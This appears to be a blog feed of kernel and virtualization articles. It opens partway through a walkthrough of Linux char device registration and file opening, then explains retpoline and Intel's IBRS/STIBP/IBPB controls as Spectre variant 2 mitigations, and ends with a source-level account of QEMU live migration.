<p>After initializing the char device and allocating the device number, we need to register this char device with the system. This is done by the ‘cdev_add’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int cdev_add(struct cdev *p, dev_t dev, unsigned count)
{
int error;
p->dev = dev;
p->count = count;
error = kobj_map(cdev_map, dev, count, NULL,
exact_match, exact_lock, p);
if (error)
return error;
kobject_get(p->kobj.parent);
return 0;
}
</code></pre></div></div>
<p>Quite simple: ‘p’ is the device to add, ‘dev’ is the device number, and count is the number of devices.</p>
<p>The core is the call to kobj_map. ‘kobj_map’ adds the char device to the hash table of the global variable ‘cdev_map’, which is defined as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct kobj_map *cdev_map;
struct kobj_map {
struct probe {
struct probe *next;
dev_t dev;
unsigned long range;
struct module *owner;
kobj_probe_t *get;
int (*lock)(dev_t, void *);
void *data;
} *probes[255];
struct mutex *lock;
};
</code></pre></div></div>
<p>The ‘probes’ field here is like the ‘chrdevs’ array: every entry represents a class of devices, and majors with the same value mod 255 share an entry.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kobj_map(struct kobj_map *domain, dev_t dev, unsigned long range,
struct module *module, kobj_probe_t *probe,
int (*lock)(dev_t, void *), void *data)
{
unsigned n = MAJOR(dev + range - 1) - MAJOR(dev) + 1;
unsigned index = MAJOR(dev);
unsigned i;
struct probe *p;
if (n > 255)
n = 255;
p = kmalloc(sizeof(struct probe) * n, GFP_KERNEL);
if (p == NULL)
return -ENOMEM;
for (i = 0; i < n; i++, p++) {
p->owner = module;
p->get = probe;
p->lock = lock;
p->dev = dev;
p->range = range;
p->data = data;
}
mutex_lock(domain->lock);
for (i = 0, p -= n; i < n; i++, p++, index++) {
struct probe **s = &domain->probes[index % 255];
while (*s && (*s)->range < range)
s = &(*s)->next;
p->next = *s;
*s = p;
}
mutex_unlock(domain->lock);
return 0;
}
</code></pre></div></div>
<p>‘kobj_map’ first allocates probes and then inserts them into one of ‘cdev_map’s probes entries.
Below is the state after calling ‘cdev_add’ for two majors satisfying major%255 = 2.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +------------------+
0 | |
+------------------+
1 | | struct probe
+------------------+
2 | +-------> +-------------------> +---------------+
+------------------+ | next | | next |
| | +---------------+ +---------------+
probes[255]| | | dev | | |
| | +---------------+ +---------------+
| | | | | |
| | +---------------+ +---------------+
| | | lock | | |
| | +---------------+ +---------------+
| | | data +--+ | data |
| | +---------------+ | +---------------+
+------------------+ |
254 | | v
+------------------+ +--------------+
| |
+--------------+
| |
+--------------+
| |
+--------------+
| |
+--------------+
struct cdev
</code></pre></div></div>
<p>After calling ‘cdev_add’, the char device has been added to the system, and the system can find it when needed. Before a user program can call the char device driver’s functions, we need to make a node in the VFS to bridge the program and the device driver.</p>
<h1 id="make-device-file-node">Make device file node</h1>
<p>A device file bridges a userspace program and a kernel driver. As we know, in Linux everything is a file, so to export the driver’s services to user programs we must make an entry in the VFS. Calling the mknod program in userspace finally issues a ‘mknod’ system call.
The kernel then allocates an inode in the filesystem. For now we only consider how the VFS connects to the char device driver, and omit how the VFS connects to the specific filesystem.
‘vfs_mknod’ calls the specific filesystem’s mknod function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int vfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, dev_t dev)
{
int error = may_create(dir, dentry);
if (error)
return error;
if ((S_ISCHR(mode) || S_ISBLK(mode)) && !capable(CAP_MKNOD))
return -EPERM;
if (!dir->i_op->mknod)
return -EPERM;
error = devcgroup_inode_mknod(mode, dev);
if (error)
return error;
error = security_inode_mknod(dir, dentry, mode, dev);
if (error)
return error;
error = dir->i_op->mknod(dir, dentry, mode, dev);
if (!error)
fsnotify_create(dir, dentry);
return error;
}
</code></pre></div></div>
<p>We will use the shmem filesystem as an example; its inode operations are ‘shmem_dir_inode_operations’.
So it calls ‘shmem_mknod’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int
shmem_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, dev_t dev)
{
struct inode *inode;
int error = -ENOSPC;
inode = shmem_get_inode(dir->i_sb, dir, mode, dev, VM_NORESERVE);
if (inode) {
error = simple_acl_create(dir, inode);
if (error)
goto out_iput;
error = security_inode_init_security(inode, dir,
&dentry->d_name,
shmem_initxattrs, NULL);
if (error && error != -EOPNOTSUPP)
goto out_iput;
error = 0;
dir->i_size += BOGO_DIRENT_SIZE;
dir->i_ctime = dir->i_mtime = CURRENT_TIME;
d_instantiate(dentry, inode);
dget(dentry); /* Extra count - pin the dentry in core */
}
return error;
out_iput:
iput(inode);
return error;
}
</code></pre></div></div>
<p>‘shmem_get_inode’ allocates a new inode representing our newly created device, /dev/chr_dev for example. As our file is a character device it is special, so ‘init_special_inode’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void init_special_inode(struct inode *inode, umode_t mode, dev_t rdev)
{
inode->i_mode = mode;
if (S_ISCHR(mode)) {
inode->i_fop = &def_chr_fops;
inode->i_rdev = rdev;
} else if (S_ISBLK(mode)) {
inode->i_fop = &def_blk_fops;
inode->i_rdev = rdev;
} else if (S_ISFIFO(mode))
inode->i_fop = &pipefifo_fops;
else if (S_ISSOCK(mode))
inode->i_fop = &bad_sock_fops;
else
printk(KERN_DEBUG "init_special_inode: bogus i_mode (%o) for"
" inode %s:%lu\n", mode, inode->i_sb->s_id,
inode->i_ino);
}
</code></pre></div></div>
<p>This function’s job is to set the inode’s ‘i_fop’ and ‘i_rdev’ fields. A char device’s ‘i_fop’ is set to ‘def_chr_fops’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> const struct file_operations def_chr_fops = {
.open = chrdev_open,
.llseek = noop_llseek,
};
</code></pre></div></div>
<p>The VFS and the device driver are now connected through ‘inode->i_rdev’.</p>
<h1 id="char-devices-operation">Char device’s operation</h1>
<p>Now the user program can open our device and issue system calls like open/write/read.</p>
<p>do_sys_open
–>do_filp_open
–>path_openat
–>do_last
–>vfs_open
–>do_dentry_open</p>
<p>After a long call chain, we arrive at the ‘do_dentry_open’ function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int do_dentry_open(struct file *f,
struct inode *inode,
int (*open)(struct inode *, struct file *),
const struct cred *cred)
{
static const struct file_operations empty_fops = {};
int error;
f->f_mode = OPEN_FMODE(f->f_flags) | FMODE_LSEEK |
FMODE_PREAD | FMODE_PWRITE;
path_get(&f->f_path);
f->f_inode = inode;
f->f_mapping = inode->i_mapping;
...
/* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
if (S_ISREG(inode->i_mode))
f->f_mode |= FMODE_ATOMIC_POS;
f->f_op = fops_get(inode->i_fop);
if (unlikely(WARN_ON(!f->f_op))) {
error = -ENODEV;
goto cleanup_all;
}
...
if (!open)
open = f->f_op->open;
if (open) {
error = open(inode, f);
if (error)
goto cleanup_all;
}
...
}
</code></pre></div></div>
<p>Here the ‘inode’ is our created ‘/dev/chr_dev’ file. We assign ‘inode->i_fop’ to ‘f->f_op’. As we know:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> inode->i_fop = &def_chr_fops;
</code></pre></div></div>
<p>So
f->f_op = &def_chr_fops</p>
<p>Later, it will call f_op->open, which is ‘chrdev_open’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int chrdev_open(struct inode *inode, struct file *filp)
{
const struct file_operations *fops;
struct cdev *p;
struct cdev *new = NULL;
int ret = 0;
spin_lock(&cdev_lock);
p = inode->i_cdev;
if (!p) {
struct kobject *kobj;
int idx;
spin_unlock(&cdev_lock);
kobj = kobj_lookup(cdev_map, inode->i_rdev, &idx);
if (!kobj)
return -ENXIO;
new = container_of(kobj, struct cdev, kobj);
spin_lock(&cdev_lock);
/* Check i_cdev again in case somebody beat us to it while
we dropped the lock. */
p = inode->i_cdev;
if (!p) {
inode->i_cdev = p = new;
list_add(&inode->i_devices, &p->list);
new = NULL;
} else if (!cdev_get(p))
ret = -ENXIO;
} else if (!cdev_get(p))
ret = -ENXIO;
spin_unlock(&cdev_lock);
cdev_put(new);
if (ret)
return ret;
ret = -ENXIO;
fops = fops_get(p->ops);
if (!fops)
goto out_cdev_put;
replace_fops(filp, fops);
if (filp->f_op->open) {
ret = filp->f_op->open(inode, filp);
if (ret)
goto out_cdev_put;
}
return 0;
out_cdev_put:
cdev_put(p);
return ret;
}
</code></pre></div></div>
<p>‘kobj_lookup’ finds the cdev in ‘cdev_map’ according to ‘i_rdev’. After the cdev has been found, filp’s ‘f_op’ is replaced by our cdev’s ops, which is the struct file_operations implemented in our char device driver.</p>
<p>Next it calls the open function of the struct file_operations implemented in the driver.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +--------------------------+
| open("/dev/chr_dev") |
+----------+----+----------+
| ^
1 | |
v |
+---------+----+-----+
| do_sys_open |
+--------+-----+-----+
inode | |
+-----------+ | +----------------5-------------------+
| | | |
+-----------+ | filp +-------------+ |
| i_fop | <-----+ | | |
+-----------+ +-------------+ +----+---+
+----+ i_rdev | +---+ f_op +-------+ fd |
| +-----------+ | +-------------+ +--------+
| | i_cdev +--------------+ | | ||
2 | +-----------+ | | +-------------|
| | +-------4-----------+
+----------------------+ | |
| 3 +--->v+----------------+
+-------+ +--------+ +----v----+ | | | read |
| +---> | +-> | | | | +----------------+
+-------+ +--------+ +----+----+ | | | write |
cdev_map | v | +----------------+
+------->----------------+ | | ioctl |
data | | | +----------------+
+---------------+ | | ... |
| ops +---+ +----------------+
+---------------+ | release |
| | |----------------+
+---------------+ file_operations
cdev
</code></pre></div></div>
<p>The picture above shows the process of opening a device file from a user process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. The kernel calls do_sys_open, gets the file's inode and calls its i_fop open, which for a char device is chrdev_open
2. chrdev_open finds the cdev in cdev_map according to inode->i_rdev
3. it assigns the probe->data to inode->i_cdev, so later opens need not search cdev_map again
4. it assigns the cdev->ops to filp->f_op, so later file system syscalls reach the driver's file_operations directly through fd->filp->f_op
5. the fd is returned to the user program
</code></pre></div></div>
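<p>The two-stage dispatch described in these steps can be modeled in a few lines of userspace C. Everything here is a simulation with hypothetical names: the kobj_lookup on cdev_map is replaced by a hard-wired driver fops table, and only the fops swap performed by replace_fops is reproduced.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Simulation of the two-stage dispatch: the inode starts out with the
 * generic def_chr_fops, whose open() swaps in the driver's own
 * file_operations (what replace_fops() does in the kernel). */
struct file;
struct file_operations {
    int (*open)(struct file *);
    int (*read)(struct file *);
};
struct file {
    const struct file_operations *f_op;
};

static int driver_open_called, driver_read_called;

static int drv_open(struct file *f) { (void)f; driver_open_called = 1; return 0; }
static int drv_read(struct file *f) { (void)f; driver_read_called = 1; return 0; }

/* The driver's file_operations, as cdev->ops would hold them. */
static const struct file_operations drv_fops = { drv_open, drv_read };

/* Generic char-device open: install the driver fops (hard-wired here
 * instead of looked up in cdev_map), then call the driver's open. */
static int chrdev_open_sim(struct file *f)
{
    f->f_op = &drv_fops;              /* replace_fops() */
    return f->f_op->open(f);
}

static const struct file_operations def_chr_fops_sim = { chrdev_open_sim, NULL };
```

After the first open, every further syscall on the file reaches the driver directly through f_op, which is exactly what step 4 above buys.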
<p>Let’s look at an example of how the fd returned by open is used, in the close function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE1(close, unsigned int, fd)
{
int retval = __close_fd(current->files, fd);
/* can't restart close syscall because file table entry was cleared */
if (unlikely(retval == -ERESTARTSYS ||
retval == -ERESTARTNOINTR ||
retval == -ERESTARTNOHAND ||
retval == -ERESTART_RESTARTBLOCK))
retval = -EINTR;
return retval;
}
EXPORT_SYMBOL(sys_close);
int __close_fd(struct files_struct *files, unsigned fd)
{
struct file *file;
struct fdtable *fdt;
spin_lock(&files->file_lock);
fdt = files_fdtable(files);
if (fd >= fdt->max_fds)
goto out_unlock;
file = fdt->fd[fd];
if (!file)
goto out_unlock;
rcu_assign_pointer(fdt->fd[fd], NULL);
__clear_close_on_exec(fd, fdt);
__put_unused_fd(files, fd);
spin_unlock(&files->file_lock);
return filp_close(file, files);
out_unlock:
spin_unlock(&files->file_lock);
return -EBADF;
}
int filp_close(struct file *filp, fl_owner_t id)
{
int retval = 0;
if (!file_count(filp)) {
printk(KERN_ERR "VFS: Close: file count is 0\n");
return 0;
}
if (filp->f_op->flush)
retval = filp->f_op->flush(filp, id);
if (likely(!(filp->f_mode & FMODE_PATH))) {
dnotify_flush(filp, id);
locks_remove_posix(filp, id);
}
fput(filp);
return retval;
}
</code></pre></div></div>
<p>It finally goes to __fput:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __fput(struct file *file)
{
struct dentry *dentry = file->f_path.dentry;
struct vfsmount *mnt = file->f_path.mnt;
struct inode *inode = file->f_inode;
might_sleep();
fsnotify_close(file);
/*
* The function eventpoll_release() should be the first called
* in the file cleanup chain.
*/
eventpoll_release(file);
locks_remove_file(file);
if (unlikely(file->f_flags & FASYNC)) {
if (file->f_op->fasync)
file->f_op->fasync(-1, file, 0);
}
ima_file_free(file);
if (file->f_op->release)
file->f_op->release(inode, file);
security_file_free(file);
if (unlikely(S_ISCHR(inode->i_mode) && inode->i_cdev != NULL &&
!(file->f_mode & FMODE_PATH))) {
cdev_put(inode->i_cdev);
}
fops_put(file->f_op);
put_pid(file->f_owner.pid);
if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
i_readcount_dec(inode);
if (file->f_mode & FMODE_WRITER) {
put_write_access(inode);
__mnt_drop_write(mnt);
}
file->f_path.dentry = NULL;
file->f_path.mnt = NULL;
file->f_inode = NULL;
file_free(file);
dput(dentry);
mntput(mnt);
}
</code></pre></div></div>
<p>From the above we can see that the kernel calls many filp->f_op functions, which are defined in the struct file_operations of the char device driver.</p>
retpoline: Principles and Deployment2018-03-24T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/03/24/retpoline
<p>This article is largely a translation of <a href="https://software.intel.com/sites/default/files/managed/1d/46/Retpoline-A-Branch-Target-Injection-Mitigation.pdf?source=techstories.org">Retpoline: A Branch Target Injection Mitigation</a>.</p>
<h3> Principles </h3>
<p>retpoline is a mitigation technique developed by Google against the Spectre variant 2 vulnerability. Spectre variant 2 abuses the CPU’s indirect branch predictor: the attacker trains the predictor in advance so that it influences the victim process, then extracts the victim’s information through a side channel. Exploiting variant 2 is actually very difficult; Jann Horn’s exploit targeted an old version of KVM, and in Linus’s words exploiting Spectre is “fairly hard”.</p>
<p>There are currently two approaches to mitigating Spectre: a hardware one and a software one. The hardware approach is IBRS + IBPB, which blocks speculative execution directly at the hardware level; of course this costs a lot of performance, which is why IBRS never made it into the kernel. The software approach is mainly retpoline, which has a much smaller performance impact and was eventually merged into the mainline kernel.</p>
<p>Whenever the CPU is about to execute an indirect branch, such as jmp [xxx] or an indirect call, it consults the indirect branch predictor and speculatively follows the most likely path. retpoline bypasses this predictor so that the CPU cannot follow a branch path deliberately trained by someone else. The name ‘retpoline’ combines “return” and “trampoline”: the indirect jump is padded with a trampoline built on the ret instruction. This will become clear below.</p>
<p>Prediction of the ret instruction differs from jmp and call: ret relies on the Return Stack Buffer (RSB). Unlike the indirect branch predictor, the RSB is a last-in, first-out stack. Executing a call pushes an entry and executing a ret pops one, which is easy for software to control, as in the following instruction sequence:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__asm__ __volatile__(" call 1f; pause;"
"1: call 2f; pause;"
"2: call 3f; pause;"
"3: call 4f; pause;"
"4: call 5f; pause;"
"5: call 6f; pause;"
</code></pre></div></div>
<p><img src="/assets/img/retpoline/retpoline.png" alt="" /></p>
<p>The figure above shows the basic principle of retpoline: a short instruction sequence replaces the original indirect jump, and if the CPU speculates, it falls into an infinite loop.</p>
<p>Let’s analyze how an indirect jmp instruction is replaced by the retpoline sequence.</p>
<p><img src="/assets/img/retpoline/jmp.png" alt="" /></p>
<p>In this example, jmp jumps indirectly through the value of rax. Without retpoline, the processor would consult the indirect branch predictor, and if an attacker had trained this branch beforehand, the CPU would speculatively execute a specific gadget. Let’s see how retpoline stops the CPU from speculating.</p>
<ol>
<li>
<p>“1: call load_label” pushes the address of “2: pause ; lfence” onto the stack (and of course also fills one RSB entry), then jumps to load_label;</p>
</li>
<li>
<p>“4: mov %rax, (%rsp)” puts the indirect jump target (*%rax) directly on top of the stack; note that from this point on, the address on top of the in-memory stack and the address in the RSB differ;</p>
</li>
<li>
<p>if the CPU speculatively executes the ret at this point, it uses the address filled into the RSB in step 1, i.e. “2: pause ; lfence”, which is an infinite loop;</p>
</li>
<li>
<p>finally, the CPU discovers that the return address on the memory stack differs from the address it speculated from the RSB, so speculation is aborted and execution jumps to *%rax.</p>
</li>
</ol>
<p>Now let’s see how a call instruction works after being replaced by the retpoline sequence.</p>
<p><img src="/assets/img/retpoline/call.png" alt="" /></p>
<ol>
<li>First, “1: jmp label2” jumps to “7: call label0”;</li>
<li>“7: call label0” pushes the address of “8: … continue execution” onto the memory stack and into the RSB, then jumps to label0;</li>
<li>“2: call label1” pushes the address of “3: pause ; lfence” onto the memory stack and into the RSB, then jumps to label1;</li>
</ol>
<p>At this point the memory stack and the RSB look like this:</p>
<p><img src="/assets/img/retpoline/4.png" alt="" /></p>
<ol>
<li>
<p>“5: mov %rax, (%rsp)” puts the indirect call target (*%rax) directly on top of the stack; again, the top of the in-memory stack and the RSB entry now differ;</p>
</li>
<li>
<p>“6: ret”: if the CPU speculatively executes this ret, it uses the address filled into the RSB in step 3, “3: pause ; lfence”, which is an infinite loop;</p>
</li>
<li>
<p>finally, the CPU discovers that the return address on the memory stack differs from the address it speculated from the RSB, so speculation is aborted and execution jumps to *%rax;</p>
</li>
</ol>
<p>The memory stack and the RSB now look like this:</p>
<p><img src="/assets/img/retpoline/5.png" alt="" /></p>
<ol>
<li>When the indirect call (*%rax) returns, the RSB and the address on the memory stack agree, and execution continues at the address pushed in step 2, i.e. location 8.</li>
</ol>
<h3> Deployment </h3>
<p>Since most indirect branches are generated by the compiler, compiler support is needed. The latest gcc supports the -mindirect-branch=thunk option, which replaces indirect branch instructions with retpoline sequences. Here is a simple example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
typedef void (*fp)();
void test()
{
printf("indirect test\n");
}
int main()
{
fp f = test;
f();
}
</code></pre></div></div>
<p>The code above is a typical indirect jump.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># gcc -mindirect-branch=thunk test.c -o test
# objdump -d test
...
00000000004004d8 <main>:
4004d8: 55 push %rbp
4004d9: 48 89 e5 mov %rsp,%rbp
4004dc: 48 83 ec 10 sub $0x10,%rsp
4004e0: 48 c7 45 f8 c7 04 40 movq $0x4004c7,-0x8(%rbp)
4004e7: 00
4004e8: 48 8b 55 f8 mov -0x8(%rbp),%rdx
4004ec: b8 00 00 00 00 mov $0x0,%eax
4004f1: e8 07 00 00 00 callq 4004fd <__x86_indirect_thunk_rdx>
4004f6: b8 00 00 00 00 mov $0x0,%eax
4004fb: c9 leaveq
4004fc: c3 retq
00000000004004fd <__x86_indirect_thunk_rdx>:
4004fd: e8 07 00 00 00 callq 400509 <__x86_indirect_thunk_rdx+0xc>
400502: f3 90 pause
400504: 0f ae e8 lfence
400507: eb f9 jmp 400502 <__x86_indirect_thunk_rdx+0x5>
400509: 48 89 14 24 mov %rdx,(%rsp)
40050d: c3 retq
40050e: 66 90 xchg %ax,%ax
...
</code></pre></div></div>
<p>We can see that the indirect jump has been replaced by the retpoline instruction sequence.
Of course, for indirect jumps written in inline assembly, the retpoline sequence has to be added by hand.</p>
<p>In the Linux kernel, a kernel command-line parameter decides whether retpoline is enabled; if it is, the kernel patches the instructions dynamically at boot. This minimizes the kernel’s performance loss.</p>
An Introduction to Spectre Mitigation2018-03-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/03/07/spectre-mitigation
<h3>Background</h3>
<p>CPUs use indirect branch predictors for speculative execution. An attacker can train the predictor to make the CPU execute specific instructions and then perform side-channel analysis. This is the Spectre variant 2 vulnerability.</p>
<p>Intel provides three mechanisms at the hardware level to control indirect branches; an operating system can use them to prevent an attacker from controlling the indirect branch predictor. The three mechanisms are IBRS, STIBP, and IBPB. This article introduces them, describes their status in Linux upstream, and offers some personal mitigation advice.</p>
<h3>Indirect Branch Control Mechanisms</h3>
<p>If CPUID.(EAX=7H,ECX=0):EDX[26] is 1, IBRS and IBPB are supported, and the OS can write IA32_SPEC_CTRL[0] (IBRS) and IA32_PRED_CMD[0] (IBPB) to control the behavior of the indirect branch predictor.
If CPUID.(EAX=7H,ECX=0):EDX[27] is 1, STIBP is supported, and the OS can write IA32_SPEC_CTRL[1] (STIBP).</p>
<p>Note the two new MSRs here, IA32_SPEC_CTRL and IA32_PRED_CMD: IBRS and STIBP are controlled through the former, IBPB through the latter. As the names suggest, IBRS and STIBP are controls while IBPB is a command; that is, IBRS and STIBP carry persistent state, whereas IBPB is a one-shot action. As a rough analogy, IBRS is like the salary you receive every month, giving a predictable increase in pocket money, while IBPB is like picking up 10 yuan from the ground.</p>
<p>Indirect Branch Restricted Speculation (IBRS): simply put, writing 1 to the IBRS control bit in higher-privileged code ensures that indirect branches are not influenced by predictor state trained at a lower privilege level, and also prevents influence from a sibling logical processor (with hyper-threading). Privilege transitions here include host user -&gt; host kernel, guest -&gt; host, and so on. IBRS can be understood as predictor isolation between privilege levels.
IBRS does not prevent predictor sharing within the same privilege level; that requires IBPB.
Nor does IBRS prevent RSB pollution; the RSB needs to be cleared when entering the privileged level.</p>
<p>Single thread indirect branch predictors (STIBP): with hyper-threading, the logical processors of a core share one indirect branch predictor. STIBP disables this sharing, preventing one logical processor’s predictor from being polluted by another. STIBP is a subset of IBRS, so once IBRS is enabled there is generally no need to enable STIBP.</p>
<p>Indirect Branch Predictor Barrier (IBPB): IBPB acts like a barrier; indirect branch predictor state from before it cannot affect what comes after it.</p>
<p>In summary, IBRS and IBPB can be combined as a mitigation for Spectre variant 2:
IBRS prevents predictor pollution across privilege levels, while IBPB prevents predictor pollution between different entities at the same privilege level (for example, between applications or between virtual machines).</p>
<h3> Linux Status and Mitigation Recommendations</h3>
<p>IBRS ultimately did not make it into the kernel because of its performance cost; upstream finally chose Google’s retpoline approach. As an aside, Google discovered the vulnerability and its own mitigation made it upstream, which is quite impressive. IBPB, as far as I can see, is already in the kernel (at least on VM switches).</p>
<p>My personal recommendations:
as seen above, there are two mitigation options to choose from.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>retpoline + IBPB: retpoline requires fairly large kernel changes and compiler support.
IBRS + IBPB: a simpler scheme with dependable stability; it can be deployed only on the virtualization side, using IBRS for guest/host and IBPB for guest/guest.
</code></pre></div></div>
<p>I suggest first measuring the performance of the second option to see how big the loss really is before deciding.</p>
<h3> References </h3>
<p><a href="http://kib.kiev.ua/x86docs/SDMs/336996-001.pdf">Speculative Execution Side Channel
Mitigations</a></p>
<p><a href="https://medium.com/@mattklein123/meltdown-spectre-explained-6bc8634cc0c2">Meltdown and Spectre, explained</a></p>
A Brief Introduction to QEMU Live Migration2018-03-01T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/03/01/qemu-live-migration
<h3> Using Live Migration </h3>
<p>The benefits of live migration in a virtualized environment are obvious, so QEMU/KVM supported it very early on.
First let’s see how it is used. Following the official <a href="https://www.linux-kvm.org/page/Migration">instructions</a>, the migration src and dst generally need access to the same VM image; for simplicity, here we just use the same VM image file on the two hosts.</p>
<p>Start a virtual machine, vm1, on the src:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu-system-x86_64 -m 2048 -hda centos.img -vnc :0 --enable-kvm
</code></pre></div></div>
<p>Start another virtual machine, vm2, on the dst:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu-system-x86_64 -m 2048 -hda centos.img -vnc :0 --enable-kvm -incoming tcp:0:6666
</code></pre></div></div>
<p>In vm1’s monitor, enter:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>migrate tcp:$ip:6666
</code></pre></div></div>
<p>After a dozen or so seconds, vm2 has become what vm1 was, and vm1 is in the stopped state.</p>
<h3> Basic Principles of Live Migration </h3>
<p><img src="/assets/img/qemulm/1.png" alt="" /></p>
<p>First, consider which parts of QEMU are involved in live migration. The gray area in the middle of the figure above is the VM’s RAM, which is a complete black box to QEMU; QEMU makes no assumptions about it and simply streams it to the dst. The area on the left represents device state; this part is guest-visible, and QEMU sends it using its own protocol. The area on the right is not migrated, but it must still match between src and dst; generally, using the same QEMU command line on both sides keeps it consistent.</p>
<p>Many conditions must be satisfied before a live migration can take place:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. Shared storage, e.g. NFS
2. The hosts' clocks must agree
3. Network configuration must match: it must not be that the src can reach some network and the dst cannot
4. Host CPU types must match, since the host exposes its instruction set to the guest
5. The VM's machine type, QEMU version, ROM versions, etc. must match
</code></pre></div></div>
<p>Live migration consists of three main steps:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. Mark all of the VM's RAM as dirty; main function: ram_save_setup
2. Iteratively send the VM's dirty RAM pages to the dst until some condition is met, e.g. the number of dirty pages is small enough; main function: ram_save_iterate
3. Stop the guest on the src, send the remaining dirty RAM to the dst, and then send the device state; main function: qemu_savevm_state_complete_precopy
</code></pre></div></div>
<p>Steps 1 and 2 correspond to the gray area in the figure above; step 3 covers the gray area plus the left-hand area.</p>
<p>After that, the QEMU process can continue running on the dst.</p>
<h3> Source Analysis of the Sending Side </h3>
<p>After entering the migrate command in QEMU’s monitor, these functions are traversed:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hmp_migrate
->qmp_migrate
->tcp_start_outgoing_migration
->socket_start_outgoing_migration
->socket_outgoing_migration
->migration_channel_connect
->qemu_fopen_channel_output
->migrate_fd_connect
</code></pre></div></div>
<p>This last function is the important one: it creates a migration thread whose thread function is migration_thread.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void migrate_fd_connect(MigrationState *s)
{
xxx
qemu_thread_create(&s->thread, "migration", migration_thread, s,
QEMU_THREAD_JOINABLE);
s->migration_thread_running = true;
}
static void *migration_thread(void *opaque)
{
xxx
qemu_savevm_state_begin(s->to_dst_file, &s->params);
xxx
while (s->state == MIGRATION_STATUS_ACTIVE ||
s->state == MIGRATION_STATUS_POSTCOPY_ACTIVE) {
xxx
if (!qemu_file_rate_limit(s->to_dst_file)) {
uint64_t pend_post, pend_nonpost;
qemu_savevm_state_pending(s->to_dst_file, max_size, &pend_nonpost,
&pend_post);
xxx
if (pending_size && pending_size >= max_size) {
xxx
/* Just another iteration step */
qemu_savevm_state_iterate(s->to_dst_file, entered_postcopy);
} else {
migration_completion(s, current_active_state,
&old_vm_running, &start_time);
break;
}
}
xxx
}
</code></pre></div></div>
<p>migration_thread is what carries out the three live-migration steps described earlier.
Let's start with the first step: qemu_savevm_state_begin marks all RAM as dirty:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu_savevm_state_begin
-->ram_save_setup
-->ram_save_init_globals
-->bitmap_new
-->bitmap_set
</code></pre></div></div>
<p>Now the second step, which is done by two functions inside migration_thread's while loop:
qemu_savevm_state_pending and qemu_savevm_state_iterate.</p>
<p>The first calls the ram_save_pending callback to determine how many bytes are still to be transferred; that part is straightforward.
The second calls the ram_save_iterate callback to ship the dirty pages to dst.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ram_save_iterate
-->ram_find_and_save_block
-->find_dirty_block
-->ram_save_host_page
-->ram_save_target_page
-->migration_bitmap_clear_dirty
-->ram_save_page
-->qemu_put_buffer_async
-->...->qemu_fflush
-->...->send
</code></pre></div></div>
<p>The while loop keeps calling ram_save_pending and ram_save_iterate, continuously sending the VM's dirty pages to dst until a certain condition is met, and then moves on to the third step.</p>
<p>The third step is migration_completion, called from migration_thread. It stops the VM on src and then copies the last remaining dirty pages over to dst.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>migration_completion
-->vm_stop_force_state
-->bdrv_inactivate_all
-->qemu_savevm_state_complete_precopy
-->ram_save_complete
-->ram_find_and_save_block
</code></pre></div></div>
<p>As you can see, the last function is the same one used to transfer dirty pages in the second phase.</p>
<h3>Destination-side code walkthrough</h3>
<p>The receiving QEMU runs with the same parameters as the sender, plus one extra option, -incoming tcp:0:6666. After parsing -incoming, QEMU waits for src to migrate over; let's look at that flow.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>main
-->qemu_start_incoming_migration
-->tcp_start_incoming_migration
-->socket_start_incoming_migration
-->socket_accept_incoming_migration
-->migration_channel_process_incoming
-->qemu_fopen_channel_input
-->migration_fd_process_incoming
-->process_incoming_migration_co
-->qemu_loadvm_state
..->bdrv_invalidate_cache_all
</code></pre></div></div>
<p>process_incoming_migration_co receives the data and resumes the VM. The most important call is qemu_loadvm_state, which receives the stream and reconstructs the VM on dst.</p>
